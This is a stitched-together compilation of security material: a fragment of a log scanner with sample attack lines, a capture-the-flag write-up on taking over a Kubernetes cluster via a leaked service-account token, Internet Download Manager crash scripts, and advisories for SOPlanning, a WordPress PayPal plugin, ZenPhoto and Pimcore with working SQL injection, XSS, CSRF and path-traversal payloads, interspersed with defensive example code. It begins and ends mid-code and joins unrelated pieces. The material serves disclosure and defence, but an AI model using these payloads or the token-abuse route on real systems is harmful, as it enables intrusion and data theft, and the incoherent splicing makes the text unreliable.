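203.0.113.5 - - [22/Aug/2012:10:01:15 +0000] "GET /MFH/download.php?file=../../../../windows/win.ini%00.jpg HTTP/1.1" 200 403
203.0.113.5 - - [22/Aug/2012:10:01:20 +0000] "GET /deki/web/deki/gui/link.php?IP=http://www.example.com/shell.txt? HTTP/1.1" 200 77
198.51.100.7 - - [22/Aug/2012:10:02:00 +0000] "GET /projects.php?go=maddons&keywords=mirc+scripts HTTP/1.1" 200 9001
198.51.100.7 - - [22/Aug/2012:10:02:30 +0000] "GET /kindeditor/index.php?name=%3Cpre%3E%3Cscript%3Ealert('XSS')%3B%3C/script%3E HTTP/1.1" 200 2200
"""


def scan_sample():
    """Findings for the constructed sample log above."""
    return scan(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in scan_sample():
        print("%s %s %r" % (f["ip"], ",".join(f["rules"]), f["target"]))
```

Decoding before matching is the important part: the raw log line for the LISTSERV probe contains `%3Cscript%3E`, not `<script>`, and the NUL in the File Host probe only exists once `%00` has been decoded. Matching the decoded form also keeps the rules short, since one pattern covers single- and double-encoded variants.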
            

Preface

Recently I have become very interested in cloud security, and I studied the architecture and operation of K8s. I happened to come across this Huawei Cloud competition and gained a lot from it.

(Even the highest privileges on the platform's challenge cluster were obtained, through an unintended route.)

0x00 Discovering the entry point of a challenge

One challenge turned out to be a site resembling an IaaS service offering. A round of directory scanning turned up a few files and routes:

phpinfo.php

robots.txt

admin/

login/

static/

The strange thing was that in an environment where phpinfo is present, we found a 403 interface belonging to a Beego framework backend.

A preliminary guess: php files are handed to nginx fastcgi for processing, and the other routes are handed to Beego.

Next, looking at the /admin route first, we find a hidden form.

So naturally I thought of brute-forcing weak passwords with Burp Suite, and found that the weak credentials admin:admin were accepted.

After a successful login, two URLs are returned: download tools.zip, and from the name /wsproxy I guessed it is a WebSocket proxy route. Looking at the tool's source code, it turns out to be a wsproxy client program.

At this point we have found a channel into the intranet.

0x01 Entering the intranet through wsproxy

Compile the tool source code obtained above directly to get the client connection program.

According to the usage instructions, a simple command connects to the challenge's wsproxy; the password is in pass.txt (uaf) in the tool's source directory, and the session is the Beego session the challenge hands out after logging in as admin.

This opens a SOCKS5 proxy on local port 1080; through this proxy we can reach the intranet.

0x02 phpinfo leaks K8s cluster information

Given the challenge's cloud name and the large amount of service information plus the K8s API server address visible in the phpinfo.php environment variables, judging by the names and values of those environment variables this is a K8s cluster, and our challenge belongs to a pod in that cluster.

0x03 Introduction to the K8s infrastructure

Before going deeper we need to understand part of the K8s infrastructure.

As the architecture figure shows, a Kubernetes cluster is mainly divided into two parts, Master and Node, which is also a typical distributed architecture.

First, external applications interact with the Master through the HTTP interface provided by the API Server, and before interacting with the API they must pass an authentication stage. A Node consists of multiple Pods; a Pod runs containers (usually Docker), and the services (apps) described run in the containers of these Pods.

Second, if we want to expose a Pod publicly we need to understand Services. A Service is an abstract way of exposing an application running on a set of Pods as a network service. A Service usually consists of an IP address that may be exposed, port mapping relations, and so on; through a Service we can reach the corresponding Pods.

Each Node has a program called kubelet, the node agent. Through this program the Node reports node information to the API Server and accepts the corresponding instructions.

From the architecture above it is not hard to see that if we want to take over the whole cluster from the outside, what we actually need is access to the REST API provided by the exposed API Server.

0x04 K8s authentication token leak + improper configuration

With the steps above we can continue to explore the K8s infrastructure.

Connecting to the intranet through the given proxy, I accessed the K8s API Server at https://10.247.0.1:443. The API Server turned out to be exposed on a network segment the proxy can reach directly, but direct access returned 401 Unauthorized, so we need to find a way to pass this authentication.

According to the contents of phpinfo.php, many services are deployed in the cluster, so we infer that all the challenge containers are orchestrated and managed through this K8s.

At the same time, when a K8s cluster is deployed, a token file is mounted by default at /run/secrets/kubernetes.io/serviceaccount/token in every pod container.

From a shell obtained in another challenge we can read this token out of that file.

A ServiceAccount mainly contains three things: namespace, token and CA. The namespace specifies the namespace the pod is in, the CA is used to verify the apiserver's certificate, and the token is used for authentication. All of them are stored into the pod's filesystem via mounts; the path the token is stored at is /var/run/secrets/kubernetes.io/serviceaccount/token.

Through the webshell obtained earlier in the WebShell_1 challenge we can obtain the API Server authentication token:

http://124.70.199.123:32003/UPLOAD/71A6E9B8-90B6-4D4F-9ACD-BD91C8BBCC5E.JSP?

Since we have obtained access to the API Server, this is equivalent to obtaining master permissions on the K8s cluster.

0x05 Obtaining cluster operation permissions

Once we have API Server permission we can do whatever we want in the cluster~ Actually, while doing this you will realise that this is not the intended solution to the challenge but should be a platform vulnerability, because after obtaining master permission you can view/control all pods (web challenges) and freely take the flag of any challenge you want.

We can operate on the API Server with the command line tool kubectl.

Create a k8s.yaml configuration file as follows; token is the token above, and server is filled in with the API server address:

apiVersion: v1
clusters:
- cluster:
    insecure-skip-tls-verify: true
    server: https://10.247.0.1
  name: cluster-name
contexts:
- context:
    cluster: cluster-name
    namespace: test
    user: admin
  name: admin
current-context: admin
kind: Config
preferences: {}
users:
- name: admin
  user:
    token: eyjhbgcioijsuzi1niisimtpzci6iij99.eyjpc3mioijrdwjlcm5zl3nlcnzpy2vy2nvdw50iwia3vizxjuzxrlcy5pby9zzxj2 awnlywnjb3vudc9uyw1lc3bhy2uioijkzwzhdwx0iwia3vizxjuzxrcy5pby9zzxj2awnlywnjb3vudc9zzwnyzxqubmftzsi6imrlz mf1bhqtdg9rzw4tbdh4ogiilcjrdwjlcm5ldgvzlmlvl3nlcnzpy2vhy2nvdw50l3nlcnzpy2utywnjb3vudc5uyw1lijoizgvmyxvsdc isimt1ymvybmv0zxmuaw8vc2vydmljzwfjy291bnqvc2vydmljzs1hy2nvdw50lnvpzci6ijziytqzn2jkltlhn2etnge0zs1iztk2ltky mjkymmzhnmziocisinn1yii6inn5c3rbtpzzj2awnlywnjb3vuddpkzwzhdwx0omrlzmf1bhqifq.xdrzlt7eemvltqbxnzb2rfwgtr 4DPVKCPP5SFTWTWTFGVUUDVDIOXGYTQIP_LQIVOLVTOPEAMBOAECP8FTSVKWMSOLYNHI5HFY6ZRTTB6DKP0VRL70PWPEVOSFFOI0EJ_NN pnjy3wxkcw5ug9j9j9uzdmw28z-crlhoiwknw-ae4op6bnrbid-l1y3nmyngoxi2aan9uud9m6bh__y8pvxg2ex9b4_fdom8wu9evfvl ya502__xgmcz
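The write-up's central point is that every pod receives the service account token at /var/run/secrets/kubernetes.io/serviceaccount/token by default, and its kubeconfig then turns off TLS verification towards the API server. As an added example, not part of the write-up, here is a small Python audit for both conditions over pod manifests, ServiceAccount objects and a kubeconfig represented as plain dictionaries (the JSON form of their YAML); it applies the Kubernetes precedence rule that a pod's own automountServiceAccountToken overrides the ServiceAccount's. The manifests are constructed for this example and the token value is a placeholder.

```python
TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"

# Constructed sample objects: four pods in the write-up's "test" namespace,
# two ServiceAccounts keyed by (namespace, name), and a kubeconfig that
# mirrors the one above with the token replaced by a placeholder.
SAMPLE_PODS = [
    # No setting anywhere: the token is mounted, which is the default.
    {"metadata": {"name": "web-challenge-1", "namespace": "test"},
     "spec": {"containers": [{"name": "app", "image": "php:7.4-fpm"}]}},
    # Opted out at the pod level.
    {"metadata": {"name": "web-challenge-2", "namespace": "test"},
     "spec": {"automountServiceAccountToken": False,
              "containers": [{"name": "app", "image": "php:7.4-fpm"}]}},
    # Silent pod, but its ServiceAccount opts out.
    {"metadata": {"name": "web-challenge-3", "namespace": "test"},
     "spec": {"serviceAccountName": "restricted",
              "containers": [{"name": "app", "image": "beego-app:1.0"}]}},
    # The pod's own setting overrides the ServiceAccount's opt-out.
    {"metadata": {"name": "web-challenge-4", "namespace": "test"},
     "spec": {"serviceAccountName": "restricted",
              "automountServiceAccountToken": True,
              "containers": [{"name": "app", "image": "beego-app:1.0"}]}},
]

SAMPLE_SERVICE_ACCOUNTS = {
    ("test", "default"): {"metadata": {"name": "default", "namespace": "test"}},
    ("test", "restricted"): {"metadata": {"name": "restricted", "namespace": "test"},
                             "automountServiceAccountToken": False},
}

SAMPLE_KUBECONFIG = {
    "apiVersion": "v1",
    "clusters": [{"name": "cluster-name",
                  "cluster": {"insecure-skip-tls-verify": True,
                              "server": "https://10.247.0.1"}}],
    "users": [{"name": "admin", "user": {"token": "<SERVICE-ACCOUNT-TOKEN-PLACEHOLDER>"}}],
}


def pod_mounts_token(pod, service_accounts):
    """Will this pod get TOKEN_PATH mounted?

    Kubernetes precedence: the pod spec's automountServiceAccountToken wins;
    otherwise the ServiceAccount's; if neither says anything, the default is to mount.
    """
    spec = pod.get("spec", {})
    if "automountServiceAccountToken" in spec:
        return bool(spec["automountServiceAccountToken"])
    ns = pod.get("metadata", {}).get("namespace", "default")
    sa_name = spec.get("serviceAccountName", "default")
    sa = service_accounts.get((ns, sa_name), {})
    return bool(sa.get("automountServiceAccountToken", True))


def insecure_clusters(kubeconfig):
    """Names of clusters whose kubeconfig entry disables TLS verification."""
    return [c.get("name", "?") for c in kubeconfig.get("clusters", [])
            if c.get("cluster", {}).get("insecure-skip-tls-verify")]


def audit(pods, service_accounts, kubeconfig):
    """Human-readable findings; an empty list means both checks passed."""
    findings = []
    for pod in pods:
        if pod_mounts_token(pod, service_accounts):
            meta = pod.get("metadata", {})
            findings.append("pod %s/%s mounts %s" % (
                meta.get("namespace", "default"), meta.get("name", "?"), TOKEN_PATH))
    for name in insecure_clusters(kubeconfig):
        findings.append("kubeconfig cluster %s has insecure-skip-tls-verify: true" % name)
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_PODS, SAMPLE_SERVICE_ACCOUNTS, SAMPLE_KUBECONFIG):
        print(line)
```

A pod that does not talk to the API server has no use for the token, so setting automountServiceAccountToken: false on the ServiceAccount (and leaving the pod silent) is the cheapest way to make a web-shell in that pod worth nothing towards the cluster; the audit also shows why the ServiceAccount-level setting alone is not enough, since a pod can re-enable the mount for itself.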

#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "IDM"
# 4 . From Menu , Downloads --> Find
# 5 . Paste ClipBoard on "File name or part of the name"
# 6 . Click Find
# 7 . Crashed ;)


crash = "\x41"*10000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
            
SOPlanning - Simple Online Planning Tool multiple vulnerabilities

CVEs: CVE-2014-8673, CVE-2014-8674, CVE-2014-8675, CVE-2014-8676, CVE-2014-8677

Vendor: http://www.soplanning.org/
Product: SOPlanning - Simple Online Planning
Version affected: 1.32 and prior

Product description:
SO Planning is an open source online planning tool completely free, designed to easily plan projects / tasks online, in order to manage and define work for a whole team. (from http://www.soplanning.org/en/index.php)

Advisory introduction:
Soplanning version 1.32 is susceptible to multiple vulnerabilities, including SQLi, XSS, path traversal, authentication information disclosure, PHP code injection.

Credit: Huy-Ngoc DAU of Deloitte Conseil, France

================================
Finding 1: Soplanning multiple SQL injection vulnerabilities (CVE-2014-8673)
================================
- SQLi in planning.php
The project, user, task filters are prone to SQLi due to lack of user input sanitization.

POC :
POST /process/planning.php HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 141
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/planning.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4,vi;q=0.2
Cookie: soplanning=[VALID SESSION COOKIE]; inverserUsersProjets=1

filtreGroupeProjet=1&projet_anything=anything') union all select 111,table_name,333,444,555,666,777,888,999 from information_schema.tables#

The query's results can be retrieved by accessing http://localhost/export_csv.php


- order by statement blind SQLi in user_list.php, projets.php, user_groupes.php, groupe_list.php
POC:
http://localhost/user_list.php?page=1&order=1,1&by=
http://localhost/projets.php?order=1,0&by=
http://localhost/user_groupes.php?page=1&order=1,(select%20case%20when%20(1=1)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=
http://localhost/groupe_list.php?page=1&order=1,(select%20case%20when%20(1=0)%20then%201%20else%201*(select%201%20from%20information_schema.tables)end)=1&by=


- triPlanning GET parameter Blind SQLi in process/planning.php
POC:
http://localhost/process/planning.php?triPlanning=1,1
and
http://localhost/process/planning.php?triPlanning=1,0
(don't follow redirection back to ../planning.php where the sanitization is done)

The difference between the TRUE and FALSE cases can be observed by accessing http://localhost/export_pdf.php?debug=1


- SQLi in LIMIT statement in nb_lignes cookie
POC: set the following cookie :
nb_lignes=20 into outfile '/tmp/poc_soplanning.txt'
and visit http://localhost/process/planning.php

Sample file output content:
ADM      \N          admin    admin    df5b909019c9b1659e86e0d6bf8da81d6fa3499e   \N          oui               000000  ["users_manage_all", "projects_manage_all", "projectgroups_manage_all", "tasks_modify_all", "tasks_view_all_projects", "parameters_all"]  [md5]    non        \N


- insecure use of addslashes function to protect against SQLi
Soplanning sanitizes user input against SQLi with the PHP addslashes() function. However, addslashes() is known to be unsafe for this purpose: it is unaware of the database connection's character set, so its escaping can be bypassed under certain multibyte encodings. mysql_real_escape_string() should be used instead.

================================
Finding 2: Soplanning multiple XSS vulnerabilities (CVE-2014-8674)
================================
- XSS via cookie manipulation in unauthenticated mode (nb_mois, nb_lignes)
This vulnerability allows an attacker with physical access to a user's browser, even in unauthenticated mode, to steal the user's authenticated session cookie.

POC:
Disconnect active user session
At authentication page, set the following cookie: nb_mois="><script>alert(document.cookie)</script><"
Login with any valid user account, an alert message will show the cookies.


- Stored XSS in calendar export functions
Export functions offer a "debug" mode which outputs HTML instead of formatted content (pdf, ical). This mode can be activated by setting the "debug" GET parameter. However, by injecting malicious HTML code into a project name for example, it is possible to conduct XSS attacks.

POC:
Create a new project with the name <script>alert(1);</script>
Access http://localhost/export_pdf.php?debug=1

================================
Finding 3: Soplanning authentication hash disclosure via GET URL in ICAL calendar sharing function (CVE-2014-8675)
================================
Soplanning allows for an ICAL calendar to be shared/used elsewhere. However, the link is generated statically using authentication information.

Sample generated link:
http://localhost/export_ical.php?login=admin&hash=61b9bab17cdab06e759f2d11ee11afab

An offline brute-force attack can thus be conducted to recover the user's password, since hash = md5($user->login . '¤¤' . $user->password);
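The design problem in Finding 3 is that the share link is a deterministic function of the password: whoever sees the URL holds a crackable digest, and the link cannot be revoked without a password change. The following is an added example (not SOPlanning code) contrasting that scheme with a random, revocable, per-user token that the server stores only as a hash. The in-memory store, user names and the `token=` parameter name are constructed; the legacy scheme assumes the '¤¤' separator is UTF-8 encoded.

```python
import hashlib
import hmac
import secrets


def legacy_share_hash(login: str, password: str) -> str:
    """The scheme described in Finding 3, reproduced only to show its properties:
    deterministic and derived from the password, so the link doubles as an
    offline-crackable digest and can only be invalidated by a password change.
    (Encoding of the '¤¤' separator assumed UTF-8.)"""
    return hashlib.md5(f"{login}¤¤{password}".encode("utf-8")).hexdigest()


class ShareTokenStore:
    """Per-user calendar share tokens: random, revocable, stored hashed.

    The token placed in the URL carries no information about the password, and
    the server keeps only sha256(token), so a leaked store does not yield usable
    links either. Constructed in-memory store; a real application persists it.
    """

    def __init__(self):
        self._hash_by_login = {}

    @staticmethod
    def _digest(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, login: str) -> str:
        """Create (or rotate) the user's share token; returns the URL-safe secret."""
        token = secrets.token_urlsafe(32)
        self._hash_by_login[login] = self._digest(token)
        return token

    def verify(self, login: str, token) -> bool:
        """Constant-time check; unknown user or missing token is a mismatch."""
        stored = self._hash_by_login.get(login)
        if stored is None or not isinstance(token, str):
            return False
        return hmac.compare_digest(stored, self._digest(token))

    def revoke(self, login: str) -> None:
        """Invalidate the shared link without touching the user's credentials."""
        self._hash_by_login.pop(login, None)

    def share_url(self, login: str, base: str = "http://localhost/export_ical.php") -> str:
        """Build a fresh share link; the 'token' parameter name is constructed."""
        return f"{base}?login={login}&token={self.issue(login)}"


if __name__ == "__main__":
    store = ShareTokenStore()
    print(store.share_url("admin"))
```

Rotating a token (calling issue() again) invalidates the previous link, which is exactly what the credential-derived scheme cannot offer short of a password change.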

================================
Finding 4: Soplanning path traversal in Holidays calendar import function (CVE-2014-8676)
================================
If error messages are activated, the vulnerability allows detecting the existence of an arbitrary file on the remote server.

POC:
http://localhost/process/feries.php?fichier=../../../../../../../etc/passwd

Sample error output when file does not exist:
Warning: file_get_contents(../../holidays/../../etc/passwd) [function.file-get-contents]: failed to open stream: No such file or directory in /[PATH]/includes/class_vcalendar.inc on line 1665

However, it is not possible to retrieve file content or conduct further attacks using this vulnerability.

================================
Finding 5: Soplanning PHP code injection in installation process (CVE-2014-8677)
================================
The installation process is prone to a PHP code execution vulnerability.

POC:
- Go to http://localhost/install
- Enter valid database credentials and host information. The database name is as follows:
  so';phpinfo();//
- The next page will show the phpinfo() results

It should be noted that in order for the attack to work, the attacker must prepare his own database server and the database user must either have access to a real database named "so';phpinfo();//", or have privileges to create any database.

For installed instances of Soplanning, the attack remains possible (i.e. the installation interface stays accessible) if:
- PHP version is older than 5.2
- Configured database server is (temporarily or not) down
- The directory smarty/templates_c is not writable


================================

Timeline:
03/08/2014 - Vulnerability discovered
11/08/2014 - Vendor notified
14/08/2014 - Vendor confirmed
09/09/2014 - Patch released

References:
Soplanning changelog : http://www.soplanning.org/en/download.php



Huy-Ngoc DAU
Senior Consultant | IT Advisory
Deloitte Conseil
185, avenue Charles de Gaulle, Neuilly-sur-Seine, 92200, France
Mobile: +33 (0)6 70 97 91 95  Tel: +33 (0)1 58 37 03 72
hdau@deloitte.fr | www.deloitte.fr

            
#!/usr/bin/env python
# Title : Internet Download Manager - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : InternetDownloadManager
# Tested on Windows 7 / Server 2008
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/mohammadreza.espargham
#
#
# downlWithIDM64.dll Exploit
#
#
# 1 . run python code : python crash.py
# 2 . open "IDM"
# 3 . Tasks --> Import --> From IDM export file
# 4 . select r3z4.ief
# 5 . Crashed ;)


hdr = "<" #start syntax
hcr = "ftp://" #pro
crash = "\x41"*1992999 #B0F
exp = hdr+hcr+crash+hdr+hcr+crash
file = open("r3z4.ief", "w")
file.write(exp)
file.close()
            
# Title: Cross-Site Request Forgery, Cross-Site Scripting and SQL Injection in CP Contact Form with Paypal Wordpress Plugin v1.1.5
# Submitter: Nitin Venkatesh
# Product: CP Contact Form with Paypal Wordpress Plugin
# Product URL: https://wordpress.org/plugins/cp-contact-form-with-paypal/
# Vulnerability Type: Cross-site Request Forgery [CWE-352], Cross-site Scripting [CWE-79], Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
# Affected Versions: v1.1.5 and possibly below.
# Tested versions: v1.1.5
# Fixed Version: v1.1.6
# Link to code diff: https://plugins.trac.wordpress.org/changeset?new=1166955%40cp-contact-form-with-paypal&old=1162550%40cp-contact-form-with-paypal
# Changelog: https://wordpress.org/plugins/cp-contact-form-with-paypal/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information:

With CP Contact Form with Paypal you can insert a contact form into a
WordPress website and connect it to a PayPal payment.

## Vulnerability Description:

The forms in the admin area of the plugin allow CSRF. This gives an attacker
the capacity to add new forms, modify existing form settings, launch XSS
attacks, export CSV files of the messages, delete forms, and perform SQL
injection.

## Proof of Concept:

<h3>CSRF - Action Links</h3>
<ul>
<li><a href="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&a=1&r=0.9305673889626347&name=csrf1">Create form/item</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=2&list=1&search=&dfrom=&dto=&cal=2&cp_contactformpp_csv=Export+to+CSV">Export to CSV</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&c=2&r=0.4520871591860098">Clone form/item</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&u=6&r=0.558320934244582&name=csrf1">Update form/item</a></li>
<li><a href="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&d=3&r=0.2828470980050731">Delete form/item</a></li>
</ul>


<h3>CSRF, XSS, SQLi - Settings form</h3>
<form action="http://localhost/wp-admin/admin.php?page=cp_contact_form_paypal&cal=11&r=0.81280830806042" method="post">
<input type="hidden" name="cp_contactformpp_post_options" value='' />

<!--
if cp_contactformpp_id is injected with XSS, the other script vectors won't work
<input type="hidden" name="cp_contactformpp_id" value='"><script>alert(3);</script>' />

SQL injection possible cp_contactformpp_id
<input type="hidden" name="cp_contactformpp_id" value="1 AND SLEEP(25)" />
-->

<input type="hidden" name="cp_contactformpp_id" value='11' />
<input type="hidden" name="fp_from_email" value='asd@evilcorp.org' />
<input type="hidden" name="fp_message" value='The following contact message has been sent:<%INFO%>&lt;/textarea&gt;<script>alert(1);</script>' />
<input type="hidden" name="cu_message" value='Thank you for your message. We will reply you as soon as possible.This is a copy of the data sent:<%INFO%>Best Regards.&lt;/textarea&gt;<script>alert(2);</script>' />
<input type="hidden" name="submit" value='Save Changes' />
<input type="submit" value="submit" />
</form>

## Solution:

Upgrade to v1.1.6

## Disclosure Timeline:

2015-05-19 - Discovered. Contacted developer on support forums.
2015-05-20 - Mailed developer initial report
2015-05-25 - Patched v1.1.6 released
2015-07-09 - Publishing disclosure to FD

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way
be responsible as to how the information in this disclosure is used.
            
Vulnerability: SQL Injection, Reflected XSS, Path Traversal
Affected Software: ZenPhoto (http://www.zenphoto.org/)
Affected Version: 1.4.8 (probably also prior versions)
Patched Version: 1.4.9
Risk: Medium
Vendor Contacted: 2015-05-18
Vendor Fix: 2015-07-09
Public Disclosure: 2015-07-10

SQL Injection
=============

  There are multiple second-order error-based SQL injections into the
ORDER BY keyword in the admin area.

   - visit zp-core/admin-options.php?saved&tab=gallery
     (alternatively visit zp-core/admin-options.php?saved&tab=image)
   - set "Sort gallery by" to "Custom"
   - set custom fields to "id,extractvalue(0x0a,concat(0x0a,(select version())))%23"
   - visit zp-core/admin-upload.php?page=upload&tab=http&type=images
   - alternatively, visiting any of these will also trigger the injection:
     /
     zp-core/admin-edit.php
     zp-core/admin-users.php?page=users
     zp-core/admin-themes.php

  The result is only directly displayed if the server is configured to
report errors, but it can also be seen in the logfile located at
zp-core/admin-logs.php?page=logs
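Both the SOPlanning sort parameters in Finding 1 above (`order=1,(select case ...)`, `triPlanning=1,0`) and the ZenPhoto "Custom" sort field inject through ORDER BY, where column names cannot be bound as query parameters and therefore end up concatenated into the SQL text; in the ZenPhoto case the value is stored first and concatenated later, so the check has to happen at the point of use as well. The following is an added example, not code from either project, showing the standard fix: an allowlist lookup for identifiers, combined with bound parameters for values such as the `projet_anything` filter. The table, rows and column names are constructed.

```python
import sqlite3

# Constructed stand-in for a planning/gallery table; not either project's schema.
SCHEMA = """
CREATE TABLE projets (id INTEGER PRIMARY KEY, nom TEXT, statut TEXT);
INSERT INTO projets VALUES (1, 'Alpha', 'open'), (2, 'Beta', 'closed'), (3, 'Gamma', 'open');
"""

# The only identifiers that may ever appear in an ORDER BY clause. A positional
# "order=1" is deliberately not accepted: map UI choices to names, not numbers.
ALLOWED_SORT_COLUMNS = {"id", "nom", "statut"}
ALLOWED_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(order_param: str, by_param: str = "asc") -> str:
    """Turn user-controlled sort parameters into a vetted ORDER BY clause.

    order_param may name several columns ("nom,id"). Every entry must match the
    allowlist exactly; otherwise ValueError is raised and nothing taken from the
    request reaches the SQL text. Apply this both when a sort preference is
    saved and when a stored preference is read back (second-order case).
    """
    columns = []
    for raw in order_param.split(","):
        col = raw.strip()
        if col not in ALLOWED_SORT_COLUMNS:
            raise ValueError(f"unknown sort column: {col!r}")
        columns.append(col)
    direction = ALLOWED_DIRECTIONS.get(by_param.strip().lower())
    if direction is None:
        raise ValueError(f"unknown sort direction: {by_param!r}")
    # Identifiers are emitted from our own constants, never from the request.
    return "ORDER BY " + ", ".join(f'"{c}" {direction}' for c in columns)


def is_safe_order_param(order_param: str, by_param: str = "asc") -> bool:
    """True if build_order_by would accept the parameters."""
    try:
        build_order_by(order_param, by_param)
        return True
    except ValueError:
        return False


def make_demo_conn() -> sqlite3.Connection:
    """In-memory database loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_projects(conn, status_filter: str, order_param: str, by_param: str = "asc"):
    """Filter rows by a *bound* value and sort by an *allowlisted* identifier.

    The status value travels as a parameter, so a payload such as
    "anything') union all select ..." is compared literally, not parsed as SQL.
    """
    sql = f"SELECT id FROM projets WHERE statut = ? {build_order_by(order_param, by_param)}"
    return [row[0] for row in conn.execute(sql, (status_filter,))]


if __name__ == "__main__":
    conn = make_demo_conn()
    print(list_projects(conn, "open", "nom", "desc"))  # [3, 1]
    print(is_safe_order_param("1,(select case when (1=1) then 1 else 1 end)=1"))  # False
```

The same allowlist approach applies to the `by=` direction and to any other fragment of SQL grammar (table names, LIMIT expressions such as the `nb_lignes` cookie) that a driver cannot bind.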

XSS 1
=====

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-upload.php?error=%26lt%3Bscript%26gt%3Balert(1)%26lt%3B%2Fscript%26gt%3B
  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/utilities/backup_restore.php?compression=%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

    The payload must first be HTML entity-encoded, and then URL encoded.

XSS 2
=====


http://localhost/zenphoto-security-fixes/zp-core/admin.php?action=external&error=" onmouseover="alert('xsstest')" foo="bar&msg=hover over me!

Directory Traversal
===================

  For an admin, it is possible to view and edit any PHP or inc files, not
just the ones inside the theme directory.

  http://localhost/zenphoto-zenphoto-1.4.8/zp-core/admin-themes-editor.php?theme=../../../../../var/www&file=secret.php


Execute Function
================

An admin user can execute any function they want via this URL (there is
no CSRF protection for it):

    localhost/zenphoto-security-fixes/zp-core/admin.php?action=phpinfo

This gives up some control over the site's control flow, which might cause
problems, especially given the missing CSRF protection.

Source
======

http://software-talk.org/blog/2015/07/second-order-sql-injection-reflected-xss-path-traversal-function-execution-vulnerability-zenphoto/
            
Vulnerability title: Directory Traversal/Configuration Update In Pimcore CMS
CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote
Details:

It is possible for an administrative user with the 'assets' permission to overwrite system configuration files by exploiting a directory traversal vulnerability.

The following request can be used to update the ‘system.xml’ file of the web application:

POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Host: pimcore.com
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.host.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4

----------2072505619
Content-Disposition: form-data; name="Filedata"; filename="system.xml" 
Content-Type: application/xml

<?xml version="1.0"?>
<zend-config xmlns:zf="http://framework.zend.com/xml/zend-config-xml/1.0/">
  <general>
    <timezone>Europe/Berlin</timezone>
    <language>en</language>
    <validLanguages>en</validLanguages>
    <debug>1</debug>
    <debugloglevel>debug</debugloglevel>
    <custom_php_logfile>1</custom_php_logfile>
  </general>
  <database>
    <adapter>Mysqli</adapter>
    <params>
      <username>root</username>
      <password>PASSWORD</password>
      <dbname>pimcore</dbname>
      <host>localhost</host>
      <port>3306</port>
    </params>
  </database>
  <documents>
    <versions>
      <steps>10</steps>
    </versions>
    <default_controller>default</default_controller>
    <default_action>default</default_action>
    <error_pages>
      <default>/</default>
    </error_pages>
    <createredirectwhenmoved/>
    <allowtrailingslash>no</allowtrailingslash>
    <allowcapitals>no</allowcapitals>
    <generatepreview>1</generatepreview>
  </documents>
  <objects>
    <versions>
      <steps>10</steps>
    </versions>
  </objects>
  <assets>
    <versions>
      <steps>10</steps>
    </versions>
  </assets>
  <services/>
  <cache>
    <excludeCookie/>
  </cache>
  <httpclient>
    <adapter>Zend_Http_Client_Adapter_Socket</adapter>
  </httpclient>
</zend-config>
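The three traversal findings on this page (SOPlanning's `fichier=../../../../../../../etc/passwd`, ZenPhoto's `theme=../../../../../var/www&file=secret.php`, and the Pimcore `dir=../config` upload above) all hand a user-controlled path fragment to a file operation without checking where it resolves. The containment check below is an added example, not code from any of the three projects: it resolves the candidate path and requires that it stay under the intended base directory. The base directories used in the demo are constructed placeholders, not the projects' real layouts.

```python
import os


class PathOutsideBase(ValueError):
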